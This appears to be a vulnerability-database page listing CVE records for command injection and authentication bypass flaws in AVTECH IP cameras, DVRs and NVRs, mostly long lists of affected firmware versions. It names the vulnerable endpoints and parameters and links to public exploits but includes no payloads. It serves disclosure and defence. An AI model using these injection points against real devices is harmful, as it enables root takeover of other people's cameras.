Affected: 1002-1000-1000-1000 Affected: 1002-1001-1001-1001 Affected: 1003-1000-1001-1000 Affected: 1003-1001-1001-1000 Affected: 1003-1001-1001-1001 Affected: 1004-1000-1000-1000 Affected: 1004-1001-1001-1001 Affected: 1004-1001-1002-1000 Affected: 1004-1002-1001-1000 Affected: 1004V-1002V-1003V-1001V Affected: 1004Y-1002Y-1001EJ-1000Y Affected: 1005-1001-1002-1000 Affected: 1005-1002-1001-1002 Affected: 1005-1002-1002-1000 Affected: 1005-1002-1004-1001 Affected: 1006-1001-1003-1000 Affected: 1006-1001-1003-1003 Affected: 1006-1002-1001-1002 Affected: 1006-1002-1003-1000 Affected: 1006R-1002R-1001R-1002R Affected: 1007-1001-1003-1000 Affected: 1007-1001-1003-1003 Affected: 1007-1002-1004-1000 Affected: 1007-1003-1005-1001 Affected: 1007E-1003E-1005EJ-1001E Affected: 1007V-1003V-1005V-1001V Affected: 1008-1001-1001-1001 Affected: 1008-1002-1002-1003 Affected: 1008-1002-1005-1000 Affected: 1008-1003-1005-1003 Affected: 1008-1004-1003-1002 Affected: 1009-1001-1002-1001 Affected: 1009-1001-1004-1000 Affected: 1009-1003-1006-1001 Affected: 1009-1004-1005-1006 Affected: 1009-1004-1006-1003 Affected: 1009Y-1003Y-1006Y-1001Y Affected: 1010-1001-1003-1001 Affected: 1010-1001-1004-1005 Affected: 1010-1002-1005-1000 Affected: 1010-1004-1007-1001 Affected: 1010-1005-1005-1002 Affected: 1011-1002-1004-1001 Affected: 1011-1002-1006-1000 Affected: 1011-1005-1007EJ-1001 Affected: 1011-1005-1008-1002 Affected: 1012-1002-1004-1001 Affected: 1012-1002-1006-1005 Affected: 1012-1002-1007-1004 Affected: 1012-1003-1001-1005 Affected: 1012-1003-1005-1005 Affected: 1012-1004-1008-1008 Affected: 1012-1008-1009-1000-FFFF Affected: 1013-1002-1006-1005 Affected: 1013-1003-1005-1001 Affected: 1013-1004-1008-1003 Affected: 1013-1004-1008-1008 Affected: 1014-1002-1007-1004 Affected: 1014-1003-1006-1001 Affected: 1014-1003-1006PL-1001 Affected: 1014-1003-1007-1001 Affected: 1014-1004-1008-1008 Affected: 1014-1005-1009-1002 Affected: 1014-1007-1009-1001 Affected: 1014L-1002L-1006L-1005L Affected: 1015-1006-1004-1002 Affected: 1015-1006-1005-1002 Affected: 1015-1006-1008-1002 Affected: 1015-1006-1008-1007 Affected: 1015-1006-1010-1003 Affected: 1015-1007-1007-1007 Affected: 1015K-1006K-1008PO-1002K Affected: 1015Y-1007Y-1010Y-1001Y Affected: 1016-1003-1007-1001 Affected: 1016-1004-1009-1009 Affected: 1016-1006-1008-1007 Affected: 1016-1007-1005-1001 Affected: 1016-1007-1009-1003 Affected: 1016-1007-1011-1001 Affected: 1016-1007-1011-1003 Affected: 1016-1008-1007-1007 Affected: 1016Y-1007Y-1011Y-1001Y Affected: 1017-1002-1008-1005 Affected: 1017-1003-1007-1002 Affected: 1017-1003-1008-1006 Affected: 1017-1008-1012-1002 Affected: 1017-1011-1013-1001-FFFF Affected: 1017k-1003k-1008k-1006k Affected: 1017Y-1008Y-1012Y-1002Y Affected: 1018-1003-1005-1004 Affected: 1018-1003-1007-1002 Affected: 1018-1003-1008-1003 Affected: 1018-1003-1008-1004 Affected: 1018-1003-1008PO-1003 Affected: 1018-1006-1009-1007 Affected: 1018-1007-1009-1003 Affected: 1018-1008-1012-1004 Affected: 1019-1003-1007-1002 Affected: 1019-1003-1008-1001 Affected: 1019-1004-1009-1007 Affected: 1019-1007-1009-1003 Affected: 1019-1009-1013-1003 Affected: 1019-1010-1009-1009 Affected: 1019c-1012c-1014c-1001c-FFFF Affected: 1020-1003-1008-1003 Affected: 1020-1003-1008-1004 Affected: 1020-1003-1010-1006 Affected: 1020-1004-1009-1007 Affected: 1020-1005-1011-1010 Affected: 1020-1005-1012-1007 Affected: 1020-1007-1008-1003 Affected: 1020-1007-1009-1003 Affected: 1021-1003-1008-1003 Affected: 1021-1003-1008-1004 Affected: 1021-1005-1011-1010 Affected: 1021-1007-1010-1003 Affected: 1021L-1003L-1010L-1006L Affected: 1021r-1004r-1009r-1007r Affected: 1022-1003-1008-1002 Affected: 1022-1004-1009-1007 Affected: 1022-1007-1012-1007 Affected: 1022-1012-1011-1009 Affected: 1022-1014-1016-1002-FFFF Affected: 1022L-1004L-1011L-1006L Affected: 1022L-1005L-1011L-1010L Affected: 1022Y-1014Y-1016Y-1002Y-FFFF Affected: 1023-1004-1010-1007 Affected: 1023-1014-1017-1002-FFFF Affected: 1025-1006-1013-1011 Affected: 1025-1008-1013-1008 Affected: 1025-1014-1013-1009 Affected: 1027-1008-1012-1008 Affected: 1027-1008-1013-1008 Affected: 1027-1014-1015-1009 Affected: 1027L-1006L-1015L-1009L Affected: 1028-1007-1014-1012 Affected: 1029-1007-1014-1008 Affected: 1030-1007-1014-1012 Affected: 1030-1008-1014-1008 Affected: 1031-1007-1015-1012 Affected: 1032-1007-1015-1008 Affected: 1032k-1007k-1015k-1008k Affected: 1036r-1008r-1016r-1009r Affected: 1037-1008-1017-1009 Affected: S749-S749-S749-S749 Affected: S820-S820-S820-S820 Affected: S823-S823-S823-S823 Affected: S855-S855-S855-S855 Affected: S914V-S914V-S914V-S914V Affected: S968-S968-S968-S968 Affected: S984-S984-S984-S984 Affected: T717-T717-T717-T717 |
Date Public
2016-10-11 00:00
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-34055",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-01T18:33:10.541355Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-01T18:33:20.804Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"modules": [
"cgi-bin/supervisor/adcommand.cgi",
"strCmd within DoShellCmd"
],
"product": "IP camera, DVR, and NVR Devices",
"vendor": "AVTECH",
"versions": [
{
"status": "affected",
"version": "1001-1000-1000-1000"
},
{
"status": "affected",
"version": "1002-1000-1000-1000"
},
{
"status": "affected",
"version": "1002-1001-1001-1001"
},
{
"status": "affected",
"version": "1003-1000-1001-1000"
},
{
"status": "affected",
"version": "1003-1001-1001-1000"
},
{
"status": "affected",
"version": "1003-1001-1001-1001"
},
{
"status": "affected",
"version": "1004-1000-1000-1000"
},
{
"status": "affected",
"version": "1004-1001-1001-1001"
},
{
"status": "affected",
"version": "1004-1001-1002-1000"
},
{
"status": "affected",
"version": "1004-1002-1001-1000"
},
{
"status": "affected",
"version": "1004V-1002V-1003V-1001V"
},
{
"status": "affected",
"version": "1004Y-1002Y-1001EJ-1000Y"
},
{
"status": "affected",
"version": "1005-1001-1002-1000"
},
{
"status": "affected",
"version": "1005-1002-1001-1002"
},
{
"status": "affected",
"version": "1005-1002-1002-1000"
},
{
"status": "affected",
"version": "1005-1002-1004-1001"
},
{
"status": "affected",
"version": "1006-1001-1003-1000"
},
{
"status": "affected",
"version": "1006-1001-1003-1003"
},
{
"status": "affected",
"version": "1006-1002-1001-1002"
},
{
"status": "affected",
"version": "1006-1002-1003-1000"
},
{
"status": "affected",
"version": "1006R-1002R-1001R-1002R"
},
{
"status": "affected",
"version": "1007-1001-1003-1000"
},
{
"status": "affected",
"version": "1007-1001-1003-1003"
},
{
"status": "affected",
"version": "1007-1002-1004-1000"
},
{
"status": "affected",
"version": "1007-1003-1005-1001"
},
{
"status": "affected",
"version": "1007E-1003E-1005EJ-1001E"
},
{
"status": "affected",
"version": "1007V-1003V-1005V-1001V"
},
{
"status": "affected",
"version": "1008-1001-1001-1001"
},
{
"status": "affected",
"version": "1008-1002-1002-1003"
},
{
"status": "affected",
"version": "1008-1002-1005-1000"
},
{
"status": "affected",
"version": "1008-1003-1005-1003"
},
{
"status": "affected",
"version": "1008-1004-1003-1002"
},
{
"status": "affected",
"version": "1009-1001-1002-1001"
},
{
"status": "affected",
"version": "1009-1001-1004-1000"
},
{
"status": "affected",
"version": "1009-1003-1006-1001"
},
{
"status": "affected",
"version": "1009-1004-1005-1006"
},
{
"status": "affected",
"version": "1009-1004-1006-1003"
},
{
"status": "affected",
"version": "1009Y-1003Y-1006Y-1001Y"
},
{
"status": "affected",
"version": "1010-1001-1003-1001"
},
{
"status": "affected",
"version": "1010-1001-1004-1005"
},
{
"status": "affected",
"version": "1010-1002-1005-1000"
},
{
"status": "affected",
"version": "1010-1004-1007-1001"
},
{
"status": "affected",
"version": "1010-1005-1005-1002"
},
{
"status": "affected",
"version": "1011-1002-1004-1001"
},
{
"status": "affected",
"version": "1011-1002-1006-1000"
},
{
"status": "affected",
"version": "1011-1005-1007EJ-1001"
},
{
"status": "affected",
"version": "1011-1005-1008-1002"
},
{
"status": "affected",
"version": "1012-1002-1004-1001"
},
{
"status": "affected",
"version": "1012-1002-1006-1005"
},
{
"status": "affected",
"version": "1012-1002-1007-1004"
},
{
"status": "affected",
"version": "1012-1003-1001-1005"
},
{
"status": "affected",
"version": "1012-1003-1005-1005"
},
{
"status": "affected",
"version": "1012-1004-1008-1008"
},
{
"status": "affected",
"version": "1012-1008-1009-1000-FFFF"
},
{
"status": "affected",
"version": "1013-1002-1006-1005"
},
{
"status": "affected",
"version": "1013-1003-1005-1001"
},
{
"status": "affected",
"version": "1013-1004-1008-1003"
},
{
"status": "affected",
"version": "1013-1004-1008-1008"
},
{
"status": "affected",
"version": "1014-1002-1007-1004"
},
{
"status": "affected",
"version": "1014-1003-1006-1001"
},
{
"status": "affected",
"version": "1014-1003-1006PL-1001"
},
{
"status": "affected",
"version": "1014-1003-1007-1001"
},
{
"status": "affected",
"version": "1014-1004-1008-1008"
},
{
"status": "affected",
"version": "1014-1005-1009-1002"
},
{
"status": "affected",
"version": "1014-1007-1009-1001"
},
{
"status": "affected",
"version": "1014L-1002L-1006L-1005L"
},
{
"status": "affected",
"version": "1015-1006-1004-1002"
},
{
"status": "affected",
"version": "1015-1006-1005-1002"
},
{
"status": "affected",
"version": "1015-1006-1008-1002"
},
{
"status": "affected",
"version": "1015-1006-1008-1007"
},
{
"status": "affected",
"version": "1015-1006-1010-1003"
},
{
"status": "affected",
"version": "1015-1007-1007-1007"
},
{
"status": "affected",
"version": "1015K-1006K-1008PO-1002K"
},
{
"status": "affected",
"version": "1015Y-1007Y-1010Y-1001Y"
},
{
"status": "affected",
"version": "1016-1003-1007-1001"
},
{
"status": "affected",
"version": "1016-1004-1009-1009"
},
{
"status": "affected",
"version": "1016-1006-1008-1007"
},
{
"status": "affected",
"version": "1016-1007-1005-1001"
},
{
"status": "affected",
"version": "1016-1007-1009-1003"
},
{
"status": "affected",
"version": "1016-1007-1011-1001"
},
{
"status": "affected",
"version": "1016-1007-1011-1003"
},
{
"status": "affected",
"version": "1016-1008-1007-1007"
},
{
"status": "affected",
"version": "1016Y-1007Y-1011Y-1001Y"
},
{
"status": "affected",
"version": "1017-1002-1008-1005"
},
{
"status": "affected",
"version": "1017-1003-1007-1002"
},
{
"status": "affected",
"version": "1017-1003-1008-1006"
},
{
"status": "affected",
"version": "1017-1008-1012-1002"
},
{
"status": "affected",
"version": "1017-1011-1013-1001-FFFF"
},
{
"status": "affected",
"version": "1017k-1003k-1008k-1006k"
},
{
"status": "affected",
"version": "1017Y-1008Y-1012Y-1002Y"
},
{
"status": "affected",
"version": "1018-1003-1005-1004"
},
{
"status": "affected",
"version": "1018-1003-1007-1002"
},
{
"status": "affected",
"version": "1018-1003-1008-1003"
},
{
"status": "affected",
"version": "1018-1003-1008-1004"
},
{
"status": "affected",
"version": "1018-1003-1008PO-1003"
},
{
"status": "affected",
"version": "1018-1006-1009-1007"
},
{
"status": "affected",
"version": "1018-1007-1009-1003"
},
{
"status": "affected",
"version": "1018-1008-1012-1004"
},
{
"status": "affected",
"version": "1019-1003-1007-1002"
},
{
"status": "affected",
"version": "1019-1003-1008-1001"
},
{
"status": "affected",
"version": "1019-1004-1009-1007"
},
{
"status": "affected",
"version": "1019-1007-1009-1003"
},
{
"status": "affected",
"version": "1019-1009-1013-1003"
},
{
"status": "affected",
"version": "1019-1010-1009-1009"
},
{
"status": "affected",
"version": "1019c-1012c-1014c-1001c-FFFF"
},
{
"status": "affected",
"version": "1020-1003-1008-1003"
},
{
"status": "affected",
"version": "1020-1003-1008-1004"
},
{
"status": "affected",
"version": "1020-1003-1010-1006"
},
{
"status": "affected",
"version": "1020-1004-1009-1007"
},
{
"status": "affected",
"version": "1020-1005-1011-1010"
},
{
"status": "affected",
"version": "1020-1005-1012-1007"
},
{
"status": "affected",
"version": "1020-1007-1008-1003"
},
{
"status": "affected",
"version": "1020-1007-1009-1003"
},
{
"status": "affected",
"version": "1021-1003-1008-1003"
},
{
"status": "affected",
"version": "1021-1003-1008-1004"
},
{
"status": "affected",
"version": "1021-1005-1011-1010"
},
{
"status": "affected",
"version": "1021-1007-1010-1003"
},
{
"status": "affected",
"version": "1021L-1003L-1010L-1006L"
},
{
"status": "affected",
"version": "1021r-1004r-1009r-1007r"
},
{
"status": "affected",
"version": "1022-1003-1008-1002"
},
{
"status": "affected",
"version": "1022-1004-1009-1007"
},
{
"status": "affected",
"version": "1022-1007-1012-1007"
},
{
"status": "affected",
"version": "1022-1012-1011-1009"
},
{
"status": "affected",
"version": "1022-1014-1016-1002-FFFF"
},
{
"status": "affected",
"version": "1022L-1004L-1011L-1006L"
},
{
"status": "affected",
"version": "1022L-1005L-1011L-1010L"
},
{
"status": "affected",
"version": "1022Y-1014Y-1016Y-1002Y-FFFF"
},
{
"status": "affected",
"version": "1023-1004-1010-1007"
},
{
"status": "affected",
"version": "1023-1014-1017-1002-FFFF"
},
{
"status": "affected",
"version": "1025-1006-1013-1011"
},
{
"status": "affected",
"version": "1025-1008-1013-1008"
},
{
"status": "affected",
"version": "1025-1014-1013-1009"
},
{
"status": "affected",
"version": "1027-1008-1012-1008"
},
{
"status": "affected",
"version": "1027-1008-1013-1008"
},
{
"status": "affected",
"version": "1027-1014-1015-1009"
},
{
"status": "affected",
"version": "1027L-1006L-1015L-1009L"
},
{
"status": "affected",
"version": "1028-1007-1014-1012"
},
{
"status": "affected",
"version": "1029-1007-1014-1008"
},
{
"status": "affected",
"version": "1030-1007-1014-1012"
},
{
"status": "affected",
"version": "1030-1008-1014-1008"
},
{
"status": "affected",
"version": "1031-1007-1015-1012"
},
{
"status": "affected",
"version": "1032-1007-1015-1008"
},
{
"status": "affected",
"version": "1032k-1007k-1015k-1008k"
},
{
"status": "affected",
"version": "1036r-1008r-1016r-1009r"
},
{
"status": "affected",
"version": "1037-1008-1017-1009"
},
{
"status": "affected",
"version": "S749-S749-S749-S749"
},
{
"status": "affected",
"version": "S820-S820-S820-S820"
},
{
"status": "affected",
"version": "S823-S823-S823-S823"
},
{
"status": "affected",
"version": "S855-S855-S855-S855"
},
{
"status": "affected",
"version": "S914V-S914V-S914V-S914V"
},
{
"status": "affected",
"version": "S968-S968-S968-S968"
},
{
"status": "affected",
"version": "S984-S984-S984-S984"
},
{
"status": "affected",
"version": "T717-T717-T717-T717"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Gergely Eberhardt (SEARCH-LAB.hu)"
}
],
"datePublic": "2016-10-11T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "An OS command injection vulnerability exists in AVTECH DVR, NVR, and IP camera devices within the \u003ccode\u003eadcommand.cgi\u003c/code\u003e endpoint, which interfaces with the ActionD daemon. Authenticated users can invoke the \u003ccode\u003eDoShellCmd\u003c/code\u003e operation, passing arbitrary input via the \u003ccode\u003estrCmd\u003c/code\u003e parameter. This input is executed directly by the system shell without sanitation allowing attackers to execute commands as the root user."
}
],
"value": "An OS command injection vulnerability exists in AVTECH DVR, NVR, and IP camera devices within the adcommand.cgi endpoint, which interfaces with the ActionD daemon. Authenticated users can invoke the DoShellCmd operation, passing arbitrary input via the strCmd parameter. This input is executed directly by the system shell without sanitation allowing attackers to execute commands as the root user."
}
],
"impacts": [
{
"capecId": "CAPEC-88",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-88 OS Command Injection"
}
]
},
{
"capecId": "CAPEC-137",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-137 Parameter Injection"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 9.4,
"baseSeverity": "CRITICAL",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "HIGH",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "HIGH",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78 Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-20",
"description": "CWE-20 Improper Input Validation",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-07T14:09:16.960Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://www.exploit-db.com/exploits/40500"
},
{
"tags": [
"product"
],
"url": "https://avtech.com/"
},
{
"tags": [
"third-party-advisory",
"technical-description"
],
"url": "https://web.archive.org/web/20240810225729/https://www.search-lab.hu/advisories/126-AVTech-devices-multiple-vulnerabilities"
},
{
"tags": [
"exploit"
],
"url": "https://web.archive.org/web/20161029201749/https://github.com/ebux/AVTECH"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://vulncheck.com/advisories/avtech-ipcamera-nvr-dvr-mulitple-vulns"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "AVTECH IP camera, DVR, and NVR Devices Authenticated Root Command Execution",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2025-34055",
"datePublished": "2025-07-01T14:46:38.848Z",
"dateReserved": "2025-04-15T19:15:22.548Z",
"dateUpdated": "2026-04-07T14:09:16.960Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-34054 (GCVE-0-2025-34054)
Vulnerability from cvelistv5 – Published: 2025-07-01 14:46 – Updated: 2026-04-07 14:09 X_Known Exploited Vulnerability
VLAI
KEVIntel
Title
AVTECH IP camera, DVR, and NVR Devices Unauthenticated Command Injection
Summary
An unauthenticated command injection vulnerability exists in AVTECH DVR devices via Search.cgi?action=cgi_query. The use of wget without input sanitization allows attackers to inject shell commands through the username or queryb64str parameters, executing commands as root. Exploitation evidence was observed by the Shadowserver Foundation on 2025-01-04 UTC.
Severity
SSVC
Exploitation: poc
Automatable: yes
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Assigner
References
5 references
| URL | Tags |
|---|---|
| https://www.exploit-db.com/exploits/40500 | exploit |
| https://avtech.com/ | product |
| https://web.archive.org/web/20240810225729/https:… | third-party-advisorytechnical-description |
| https://web.archive.org/web/20161029201749/https:… | exploit |
| https://vulncheck.com/advisories/avtech-ipcamera-… | third-party-advisory |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| AVTECH | IP camera, DVR, and NVR Devices |
Affected:
1008-1002-1005-1000
Affected: 1009-1003-1006-1001 Affected: 1009Y-1003Y-1006Y-1001Y Affected: 1010-1004-1007-1001 Affected: 1011-1005-1008-1002 Affected: 1014-1005-1009-1002 Affected: 1015-1006-1010-1003 Affected: 1016-1007-1011-1003 Affected: 1017-1008-1012-1002 Affected: 1017Y-1008Y-1012Y-1002Y Affected: 1018-1008-1012-1004 Affected: 1019-1009-1013-1003 Affected: 1019c-1012c-1014c-1001c-FFFF Affected: 1022-1014-1016-1002-FFFF Affected: 1022Y-1014Y-1016Y-1002Y-FFFF Affected: 1023-1014-1017-1002-FFFF |
Date Public
2016-10-11 00:00
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-34054",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-01T18:46:33.820743Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-01T18:46:40.272Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"modules": [
"Search.cgi",
"username parameter",
"queryb64str"
],
"product": "IP camera, DVR, and NVR Devices",
"vendor": "AVTECH",
"versions": [
{
"status": "affected",
"version": "1008-1002-1005-1000"
},
{
"status": "affected",
"version": "1009-1003-1006-1001"
},
{
"status": "affected",
"version": "1009Y-1003Y-1006Y-1001Y"
},
{
"status": "affected",
"version": "1010-1004-1007-1001"
},
{
"status": "affected",
"version": "1011-1005-1008-1002"
},
{
"status": "affected",
"version": "1014-1005-1009-1002"
},
{
"status": "affected",
"version": "1015-1006-1010-1003"
},
{
"status": "affected",
"version": "1016-1007-1011-1003"
},
{
"status": "affected",
"version": "1017-1008-1012-1002"
},
{
"status": "affected",
"version": "1017Y-1008Y-1012Y-1002Y"
},
{
"status": "affected",
"version": "1018-1008-1012-1004"
},
{
"status": "affected",
"version": "1019-1009-1013-1003"
},
{
"status": "affected",
"version": "1019c-1012c-1014c-1001c-FFFF"
},
{
"status": "affected",
"version": "1022-1014-1016-1002-FFFF"
},
{
"status": "affected",
"version": "1022Y-1014Y-1016Y-1002Y-FFFF"
},
{
"status": "affected",
"version": "1023-1014-1017-1002-FFFF"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Gergely Eberhardt (SEARCH-LAB.hu)"
}
],
"datePublic": "2016-10-11T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "An unauthenticated command injection vulnerability exists in AVTECH DVR devices via Search.cgi?action=cgi_query. The use of wget without input sanitization allows attackers to inject shell commands through the username or queryb64str parameters, executing commands as root.\u0026nbsp;Exploitation evidence was observed by the Shadowserver Foundation on 2025-01-04 UTC."
}
],
"value": "An unauthenticated command injection vulnerability exists in AVTECH DVR devices via Search.cgi?action=cgi_query. The use of wget without input sanitization allows attackers to inject shell commands through the username or queryb64str parameters, executing commands as root.\u00a0Exploitation evidence was observed by the Shadowserver Foundation on 2025-01-04 UTC."
}
],
"impacts": [
{
"capecId": "CAPEC-88",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-88 OS Command Injection"
}
]
},
{
"capecId": "CAPEC-137",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-137 Parameter Injection"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 10,
"baseSeverity": "CRITICAL",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "HIGH",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "HIGH",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78 Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-07T14:09:16.220Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://www.exploit-db.com/exploits/40500"
},
{
"tags": [
"product"
],
"url": "https://avtech.com/"
},
{
"tags": [
"third-party-advisory",
"technical-description"
],
"url": "https://web.archive.org/web/20240810225729/https://www.search-lab.hu/advisories/126-AVTech-devices-multiple-vulnerabilities"
},
{
"tags": [
"exploit"
],
"url": "https://web.archive.org/web/20161029201749/https://github.com/ebux/AVTECH"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://vulncheck.com/advisories/avtech-ipcamera-nvr-dvr-mulitple-vulns"
}
],
"source": {
"discovery": "UNKNOWN"
},
"tags": [
"x_known-exploited-vulnerability"
],
"title": "AVTECH IP camera, DVR, and NVR Devices Unauthenticated Command Injection",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2025-34054",
"datePublished": "2025-07-01T14:46:00.832Z",
"dateReserved": "2025-04-15T19:15:22.548Z",
"dateUpdated": "2026-04-07T14:09:16.220Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-34053 (GCVE-0-2025-34053)
Vulnerability from cvelistv5 – Published: 2025-07-01 14:45 – Updated: 2026-04-07 14:09
VLAI
Title
AVTECH IP camera, DVR, and NVR Devices Authentication Bypass via .cab Path Manipulation
Summary
An authentication bypass vulnerability exists in AVTECH IP camera, DVR, and NVR devices’ streamd web server. The strstr() function is used to identify ".cab" requests, allowing any URL containing ".cab" to bypass authentication and access protected endpoints.
Severity
SSVC
Exploitation: poc
Automatable: no
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-290 - Authentication Bypass by Spoofing
Assigner
References
5 references
| URL | Tags |
|---|---|
| https://www.exploit-db.com/exploits/40500 | exploit |
| https://avtech.com/ | product |
| https://web.archive.org/web/20240810225729/https:… | third-party-advisorytechnical-description |
| https://web.archive.org/web/20161029201749/https:… | exploit |
| https://vulncheck.com/advisories/avtech-ipcamera-… | third-party-advisory |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| AVTECH | IP camera, DVR, and NVR devices |
Affected:
1000-1000-1000-1000
Affected: 1000C-1000C-1000C-1000C Affected: 1001-1000-1000-1000 Affected: 1001-1001-1000-1000 Affected: 1002-1000-1000-1000 Affected: 1002-1002-1000-1002 Affected: 1002D-1000D-1000D-1000D Affected: 1003-1000-1000-1001 Affected: 1003-1001-1001-1000 Affected: 1003-1002-1001-1000 Affected: 1004-1000-1000-1000 Affected: 1004-1001-1001-1001 Affected: 1004-1003-1001-1002 Affected: 1004-1003-1002-1001 Affected: 1004A-1001A-1002A-1000A Affected: 1005-1002-1001-1002 Affected: 1005-1003-1001-1002 Affected: 1005-1004-1002-1001 Affected: 1005A-1001A-1002A-1001A Affected: 1005D-1001D-1002D-1001D Affected: 1006-1002-1001-1002 Affected: 1006-1004-1003-1001 Affected: 1007-1001-1003-1001 Affected: 1007-1001-1004-1003 Affected: 1007-1002-1001-1003 Affected: 1007-1002-1003-1002 Affected: 1007-1004-1003-1001 Affected: 1008-1001-1003-1002 Affected: 1008-1004-1004-1001 Affected: 1008D-1003D-1004D-1002D Affected: 1008J-1004J-1004J-1001J Affected: 1009-1001-1004-1001 Affected: 1009-1002-1005-1003 Affected: 1009-1003-1005-1002 Affected: 1010-1001-1004-1001 Affected: 1010-1001-1004-1002 Affected: 1010-1003-1005-1002 Affected: 1010-1003-1006-1003 Affected: 1010-1003-1006-1004 Affected: 1010-1004-1007-1001 Affected: 1010J-1001J-1004J-1001J Affected: 1010N-1003N-1005N-1002N Affected: 1011-1001-1002A-1002 Affected: 1011-1001-1002D-1002 Affected: 1011-1001-1003-1002 Affected: 1011-1001-1004-1002 Affected: 1011-1001-1005-1002 Affected: 1011-1004-1005-1002 Affected: 1012-1001-1005-1002 Affected: 1012-1001-1005-1003 Affected: 1012-1001-1005PO-1002 Affected: 1012-1003-1007-1002 Affected: 1012-1003-1007-1004 Affected: 1013-1001-1005-1003 Affected: 1013-1002-1006-1002 Affected: 1013-1003-1008-1003 Affected: 1013-1004-1008-1004 Affected: 1013-1005-1005-1002 Affected: 1013-1005-1007-1002 Affected: 1013K-1005K-1007PO-1002K Affected: 1014-1002-1006-1002 Affected: 1014-1002-1006-1003 Affected: 1014-1003-1008-1003 Affected: 1014-1005-1008-1002 